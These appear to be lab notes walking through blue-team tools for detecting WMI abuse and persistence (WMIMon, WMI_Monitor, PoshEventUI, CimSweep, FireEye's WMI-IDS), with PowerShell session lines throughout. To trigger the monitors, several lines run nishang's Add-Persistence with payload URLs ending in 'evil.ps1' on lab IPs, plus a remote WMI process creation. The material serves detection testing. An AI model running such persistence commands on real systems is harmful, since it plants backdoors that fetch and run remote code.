WMI Blue Team tools

WMIMON -> tool to monitor WMI activities :

https://github.com/luctalpe/WMIMon

Realtime event tracelog(ETL) consumer for WMI-activity log.

PS C:\Users\victim6\Downloads\WMIMon-master\WMIMon-master\Downloads\WMIMon_Binaries> .\WMIMon.exe

On another PS session:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Invoke-WmiMethod -Class win32_process -name create -ArgumentList calc.exe -ComputerName 192.168.222.130

On previous PS session we can see the connection on it.

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem

WMI_Monitor: tool to log WMI consumers and processes.

https://github.com/realparisi/WMI_Monitor

Uses WMI permanent event consumers to monitor creation of other consumers.

New-EventSubscribeMonitor – creates an entry with Event ID 8 in application event log with source WSH.

Also see posteventUI

https://github.com/proxb/PoshEventUI

https://github.com/realparisi/WMI_Monitor

PS C:\Users\victim6\Downloads\WMI_Monitor-master\WMI_Monitor-master> . .\WMIMonitor.ps1

PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Remove-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-Persistence -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadURL http://192.168.222.130:443/evil.ps1

Now on event viewer we can see the logs on it.

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-SubscriberMonitor

Now  go to try another tool.

Go to posheventui-master folder.

https://github.com/proxb/PoshEventUI

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> cd C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master

PS C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master> . .\WMIEventUtility.ps1

Here click on new icon from consumer section.

CIMSweep perform incident response and hunting operations on scale by leveraging CIM/WMI.

https://github.com/PowerShellMafia/CimSweep/tree/master/CimSweep

PS C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master> cd C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> ls

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Import-Module .\CimSweep.psd1 –verbose

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSService

A lot more in output.

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-Command -module cimsweep

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> get-cstypedURL

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> $sess = New-CimSession -ComputerName DESKTOP-E622G7D

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSTypedURL -CimSession $sess

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSWmiPersistence

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSWmiPersistence -CimSession $sess

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-Command -module cimsweep

WMI-IDS A POC agent-less host intrusion detection system:

https://github.com/fireeye/flare-wmi/tree/master/WMI-IDS

Useful for detecting persistence mechanisms & raise alerts based on triggers.

https://github.com/fireeye/flare-wmi/tree/master/WMI-IDS

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> cd C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> dir

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Import-Module .\WMI_IDS.psm1 –verbose

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Get-WMIPersistenceItem

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> help Register-Alert –Examples

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> New-AlertTrigger -EventConsumer CommandLineEventConsumer -TriggerType Creation | New-AlertAction -EventLogEntry | Register-Alert

We check on event viewer no new logs are there.

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Remove-Persistence –remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadURL http://192.168.222.132/evil.ps1 -verbose

Now new entry is there on event viewer.

Now other tools for the same:

UPRoot:->

https://github.com/invoke-IR/uproot/

Kansa:->

https://github.com/davehull/kansa/

@Saksham Dixit